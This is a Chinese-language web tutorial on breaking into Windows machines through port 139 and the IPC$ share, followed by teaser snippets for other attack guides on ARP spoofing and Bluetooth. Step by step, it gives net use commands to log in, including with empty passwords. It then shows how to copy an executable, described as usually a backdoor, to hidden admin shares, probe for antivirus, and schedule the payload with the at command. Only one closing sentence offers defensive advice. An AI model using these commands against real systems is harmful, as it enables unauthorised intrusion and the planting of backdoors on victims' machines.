提到139埠,我想知道的人一定非常多,本來是不想用寫這個教程的,但考慮要照顧到新人,所以還是簡單的寫一下。
首先,連線的命令是:
netuse\\ip位址\ipc$content$lt;空格》密碼/user:使用者名稱
net use \\192.168.1.11\ipc$content$nbsp;123456 /user:google 如果連線成功,那麼系統會提示"命令成功完成"!
空密碼是這樣的:
如果密碼是空的,那就在原先輸入密碼的地方以""代替。
開始檢視許可權:
檢視登入後使用者許可權的方法很簡單,只要給目標系統傳個檔案就可以了,如果傳誦成功,那麼一般都是系統管理員許可權了,如果不成功可能就是來訪者許可權或者其他使用者組的。命令的格式是這樣的:
copy<>檔案絕對路徑<>\\ip位址\檔案目標路徑
比如我要將本地c盤下的a.exe檔案拷貝到192.168.1.11的d盤下:
copy c:\a.exe \\192.168.1.11\d$content$nbsp;
要注意"$"符,那是隱藏共享盤的表示符,如果對方的共享盤不是隱藏的,就不需要"$"符了。如果命令執行成功,系統同樣會提示"已複製 1 個檔案"
小技巧:
再次複製相同檔案至相同路徑,以檢測是否存在防毒軟體!!!
如果系統提示「改寫 \\192.168.1.11\d$\a.exe 嗎? (yes/no/all):」則說明檔案在還在目標系統上,沒有被防毒軟體查殺(一般傳送過去的都是後門程式隻類的東西,只有系統安裝了防毒軟體都會被殺掉)。如果沒有提示,則說明安裝了防毒軟體。
檢視目標系統時間,準備使用at任務計畫執行程式。
例子: net time \\192.168.1.11
系統會返回目標的當前時間,時間顯示後,at任務計畫命令需要使用24小時制。比如系統顯示「\\192.168.1.11 的當前時間是 2006/5/10 下午 06:02」在使用到at任務計畫命令時,這個「下午06:02」就需要換算成「18:02」!
使用at命令為目標系統新增任務計畫:
例子: at \\192.168.1.11 18:20 d:\a.exe
ipc通道入侵就目前來看已經是乙個非常老的攻擊手段了,現在針對ipc通道的防禦手段也越來越多,越來越簡單。但如果乙個攻擊者成功獲得了ipc通道的乙個system許可權,那對於被攻擊的系統來說無意是致命的。 所以,建議使用者將server服務關閉,信使服務與task scheduler服務(計畫任務)也都關閉,這樣可以較全面的保護計算機在ipc通道方面的安全。
139埠入侵簡易教程
一篇老文章了 net use 192.168.0.1 ipc content nbsp user administrator 提到139埠,我想知道的人一定非常多,本來是不想用寫這個教程的,但考慮要照顧到新人,所以還是簡單的寫一下。首先,連線的命令是 net use 192.168.1.11 ipc...
kali內網攻擊 arpspoof
arpspoof是一款arp欺騙攻擊工具 檢視物理機ip位址,將kali的ip位址設定為和物理機同一網段。虛擬機器網路介面卡設定為橋接模式 複製物理網路連線狀態 虛擬網路編輯器在管理員模式下啟動後,設定vmnet0為橋接模式,外部鏈結選擇物理機網絡卡。開啟埠 echo 1 proc sys net ...
kali連線藍芽 藍芽攻擊指南(kali)
基本操作 hciconfig 檢視藍芽裝置資訊 hcitool 這是乙個查詢工具。可以用來查詢裝置名稱,裝置id,裝置類別和裝置時鐘。hcidump 可以使用這個來嗅探藍芽通訊 hciconfig hci0 up 啟動藍芽裝置 hciconfig hci0 down 關閉藍芽裝置 service b...